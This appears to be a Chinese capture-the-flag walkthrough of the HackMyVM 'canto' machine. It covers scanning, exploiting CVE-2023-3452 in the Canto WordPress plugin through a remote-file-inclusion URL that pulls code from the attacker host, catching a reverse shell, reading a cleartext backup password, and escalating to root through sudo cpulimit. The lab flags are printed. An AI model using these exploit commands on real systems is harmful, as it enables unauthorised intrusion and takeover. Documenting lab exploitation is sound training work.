HackMyVM-canto-Walkthrough

信息收集

服务探测

开放80端口

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.129  08:00:27:0f:3d:b4       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.952 seconds (131.15 hosts/sec). 4 responded
❯ ip=192.168.60.129
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.129:22
Open 192.168.60.129:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 15:38 CST
Initiating ARP Ping Scan at 15:38
Scanning 192.168.60.129 [1 port]
Completed ARP Ping Scan at 15:38, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:38
Completed Parallel DNS resolution of 1 host. at 15:38, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:38
Scanning 192.168.60.129 [2 ports]
Discovered open port 22/tcp on 192.168.60.129
Discovered open port 80/tcp on 192.168.60.129
Completed SYN Stealth Scan at 15:38, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.129
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-01-01 15:38:37 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:0F:3D:B4 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

不去浏览器看了吧，用whatweb扫一下，很明显是个wordpress的cms

❯ whatweb $ip
http://192.168.60.129 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[192.168.60.129], MetaGenerator[WordPress 6.7.1], Script[importmap,module], Title[Canto], UncommonHeaders[link], WordPress[6.7.1]

wpscan直接扫

❯ wpscan --url http://$ip -e vp --api-token "换成自己的api token"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.129/ [192.168.60.129]
[+] Started: Wed Jan  1 15:40:39 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.129/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.129/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.60.129/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.129/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.60.129/index.php/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.60.129/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.60.129/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://192.168.60.129/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.3
 | [!] Directory listing is enabled
 | Style URL: http://192.168.60.129/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.60.129/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Wed Jan  1 15:40:43 2025
[+] Requests Done: 35
[+] Cached Requests: 5
[+] Data Sent: 8.487 KB
[+] Data Received: 123.155 KB
[+] Memory used: 245.793 MB
[+] Elapsed time: 00:00:03

发现好像并没有什么漏洞，我只能根据网站标题和wordpress结合去搜索发现

用户提权

这个canto是个wordpress的插件，而且还有文件包含和RCE漏洞

尝试利用下

❯ searchsploit canto
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)                                                 | windows/dos/45095.py
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)                                                         | multiple/webapps/49189.txt
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)                        | php/webapps/51826.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
~                                                                                                                                            15:53:55
❯ searchsploit -m php/webapps/51826.py
❯ python3 51826.py
usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]
51826.py: error: the following arguments are required: -u/--url, -LHOST/--local_host
usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]

Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Vulnerable URL
  -s SHELL, --shell SHELL
                        Local file for web shell
  -LHOST LOCAL_HOST, --local_host LOCAL_HOST
                        Local web server IP
  -LPORT LOCAL_PORT, --local_port LOCAL_PORT
                        Local web server port
  -c COMMAND, --command COMMAND
                        Command to execute on the target
  -NC_PORT NC_PORT, --nc_port NC_PORT
                        Listener port for netcat

    Examples:
    - Check the vulnerability
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33

    - Execute a command
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

    - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php

查看用法直接上传一个反弹shell吧

❯ python3 51826.py -u http://192.168.60.129 -LHOST 192.168.60.100 -s php-reverse-shell.php
invalid local port NoneLocal web server on port 8080...

Exploitation URL: http://192.168.60.129/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.60.100:8080&cmd=whoami
192.168.60.129 - - [01/Jan/2025 16:02:05] "GET /wp-admin/admin.php HTTP/1.1" 200 -
-------------------------------------------------------------------
❯ pwncat -l 4444
id
Linux canto 6.5.0-28-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 28 23:46:48 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 08:02:04 up 29 min,  0 user,  load average: 0.06, 0.03, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

可以在用户家目录找到一个notes提示

$ cat D*
On the first day I have updated some plugins and the website theme.
I almost lost the database with my user so I created a backups folder.

说明创建了备份文件

$ find / -name *backup* 2>/dev/null
-------------省略
/var/wordpress/backups
$ cd /var/wordpress/backups
$ ls
12052024.txt
$ cat 12*
------------------------------------
| Users     |      Password        |
------------|----------------------|
| erik      | th1sIsTheP3ssw0rd!   |
------------------------------------

Root提权

ssh连接一下

❯ ssh [email protected]
The authenticity of host '192.168.60.129 (192.168.60.129)' can't be established.
ED25519 key fingerprint is SHA256:jRCgzH5SXuNm8Cv3PUWt4FXgI74f7392+2lVl33dL2g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.129' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 23.10 (GNU/Linux 6.5.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com                                * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Jan  1 08:11:08 AM UTC 2025

  System load:  0.04              Processes:               107
  Usage of /:   43.4% of 8.02GB   Users logged in:         0
  Memory usage: 16%               IPv4 address for enp0s3: 192.168.60.129  Swap usage:   0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May 12 17:19:50 2024 from 192.168.1.163
erik@canto:~$ cat user.txt
d41d8cd98f00b204e9800998ecf8427e
erik@canto:~$ erik@canto:~$ sudo -l
Matching Defaults entries for erik on canto:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit

发现有sudo权限

直接利用这个cpulimit提取即可

erik@canto:~$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 1671 detected
root@canto:/home/erik# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:/home/erik# cat /root/root.txt
1b56eefaab2c896e57c874a635b24b49